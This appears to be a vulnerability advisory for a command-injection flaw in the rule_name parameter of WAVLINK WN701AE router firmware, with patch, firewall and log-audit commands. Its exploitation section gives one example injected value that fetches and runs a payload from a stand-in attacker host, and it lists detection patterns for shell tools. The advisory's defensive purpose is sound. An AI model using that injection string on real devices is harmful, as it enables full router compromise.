Executive & SecOps Summary

SECOPS ASSESSMENT
Affected Scope

WAVLINK WN701AE router devices running firmware version M01AE_V260105

Impact

Authenticated remote attackers can execute arbitrary OS commands via the web management interface, leading to complete device compromise

Mitigation

Restrict external access to the web administration interface and apply firmware updates or implement strict firewall access control lists (ACLs)

Affected Products & Version Scope

WAVLINK WN701AE Router - Firmware Version M01AE_V260105 (ioos Web Backend component)

Remediation & Live Workaround Commands

PATCH & WORKAROUND

1. Official Patch & Version Upgrade Commands

Contact WAVLINK support to obtain the latest secure firmware version addressing this vulnerability. Upgrade the firmware via the web GUI or use the following CLI commands if SSH access is available:

bash
# 1. Download the latest secure firmware image from the official vendor repository
wget http://firmware.wavlink.com/wn701ae/latest_secure_firmware.bin -O /tmp/firmware.bin

# 2. Verify the integrity of the downloaded firmware using SHA256
echo 'expected_sha256_hash /tmp/firmware.bin' | sha256sum -c -

# 3. Execute the system upgrade command
sysupgrade -v /tmp/firmware.bin

2. Temporary Workaround & Hardening Configuration

If an immediate firmware patch is not feasible, restrict access to the router's web administration interface from the WAN side and limit access to trusted internal IP addresses only.

bash
# Block external WAN access to web administration ports (TCP 80, 443) using iptables
iptables -A INPUT -i eth0 -p tcp --dport 80 -j DROP
iptables -A INPUT -i eth0 -p tcp --dport 443 -j DROP

# Allow web administration access only from a trusted management IP (e.g., 192.168.1.100)
iptables -A INPUT -p tcp -s 192.168.1.100 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -s 192.168.1.100 --dport 443 -j ACCEPT

3. Log Audit & IoC Verification Commands

Inspect system logs and active processes to detect potential exploitation attempts or unauthorized shell activity.

bash
# 1. Search web server access logs and system logs for suspicious shell metacharacters in static_route_setting.sh requests
grep -E 'static_route_setting.sh.*[\|;&]' /var/log/messages /var/log/httpd-access.log 2>/dev/null

# 2. Check for suspicious active processes or reverse shell connections
ps | grep -E 'sh|bash|nc|wget|curl'
netstat -antp | grep -E 'ESTABLISHED'

Technical Root Cause & Exploitation Mechanics

1. Vulnerability Overview & Root Cause

A critical vulnerability (CVE-2026-120227) has been identified in the ioos Web Backend component of the WAVLINK WN701AE router. The root cause lies within the del_staticrule function in the static_route_setting.sh script. The script fails to properly sanitize or escape the user-supplied rule_name parameter before passing it to a system shell for execution. This lack of input validation allows an attacker to inject shell metacharacters (such as ;, &, or |), resulting in arbitrary OS command injection (CWE-77, CWE-78).

2. Exploitation Mechanics & Attack Scenario

To exploit this vulnerability, an attacker must first authenticate to the router's web management interface. The attacker then navigates to the static routing configuration and sends a crafted request to delete a static route. By embedding malicious shell commands within the rule_name parameter (e.g., rule1; wget http://attacker.com/payload -O- | sh), the backend script executes the injected payload with root privileges on the underlying Linux operating system. A public exploit is currently available, increasing the likelihood of active exploitation in the wild.

3. Infrastructure & Business Impact

With a CVSS score of 9.9 (Critical), this vulnerability poses a severe threat to network infrastructure. Successful exploitation grants the attacker full administrative control over the router. Attackers can leverage this foothold to perform lateral movement within the internal network, intercept and manipulate network traffic, modify DNS settings for phishing campaigns, or enlist the compromised device into a DDoS botnet.

Official Vendor Advisories & References

NVD Original English Description

A vulnerability was detected in WAVLINK WN701AE M01AE_V260105. This affects the function del_staticrule of the file static_route_setting.sh of the component ioos Web Backend. Performing a manipulation of the argument rule_name results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure.
